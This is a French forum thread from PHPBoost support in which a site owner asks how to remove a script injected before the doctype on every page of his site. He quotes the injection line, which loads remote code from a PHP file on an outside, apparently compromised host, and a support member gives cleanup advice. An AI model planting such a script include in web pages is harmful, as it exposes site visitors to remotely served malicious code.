SCript inconnu sur toute les pages
Nathanhell Membre non connecté
Booster Fronde
-
Booster Fronde
- Voir le profil du membre Nathanhell
- Inscrit le : 21/04/2011
J'ai un script qui apparait sur toute les pages de mon site sans que je ne sache d'où il sorte et comment m'en débarrasser.
il apparait systématiquement en tête de toute les pages. avant le doctype.
Code :
<script type="text/javascript" src="http://trackbikesale.net/wp-content/themes/twentytwelve/ph2w7y4h.php?id=10118879"></script><script type="text/javascript" src="http://trackbikesale.net/wp-content/themes/twentytwelve/ph2w7y4h.php?id=10118879"></script>Si quelqu'un peut m'expliquer la démarche pour me débarrasser de ceci.
Google me bloque le site a cause de cela.
janus57 Membre non connecté
-
Booster Fusée
- Voir le profil du membre janus57
- Inscrit le : 07/12/2007
- Groupes :
-
Equipe Assistance
vérifier si vous n'avez pas eu une intrusion sur le FTP.
En quelle version de PHPBoost vous êtes ?
Cordialement, janus57
Nathanhell Membre non connecté
Booster Fronde
-
Booster Fronde
- Voir le profil du membre Nathanhell
- Inscrit le : 21/04/2011
Hier quand j'ai été débloqué j'ai passé un antivirus qui n'a rien trouvé (celui de l'hébergeur ... ) j'ai changer le mot de passe utilisateur qui control tout de la base de donnée au mails ... j'ai essayer d'ouvrir plusieurs fichiers vu que le souci semblait au départ lier à /news et la je n'ai retrouvé ce code nul part. J'en déduit qu'il est dans un coin qui est appelé par Phpboost au moment de la génération des pages ... le souci c'est que taper au hasard fichier après fichier est un peu long et que le site se retrouve de nouveau hors ligne a chaque fois .... et que je n'ai donc plus accès au ftp.
janus57 Membre non connecté
-
Booster Fusée
- Voir le profil du membre janus57
- Inscrit le : 07/12/2007
- Groupes :
-
Equipe Assistance
faut demander à hébergeur pour avoir accès au fichiers et les télécharger en local (pas dans un WAMP !), puis en local faut regarder les fichiers TPL, le dossier /upload et les index.php, ce sont les 3endroits ou un script malicieux va tenter de s'installer.
Ensuite après le nettoyage va falloir trouver la source, intrusion FTP ? failles dans la version 4.0.6 ? Compte admin compromis ? Tout le compte de l'hébergeur compromis ?
Il y a pas mal de source possible, don un PC infecté par un virus/trojan/ver ou autre saloperie.
Cordialement, janus57
Nathanhell Membre non connecté
Booster Fronde
-
Booster Fronde
- Voir le profil du membre Nathanhell
- Inscrit le : 21/04/2011
Répondre
Vous n'êtes pas autorisé à écrire dans cette catégorie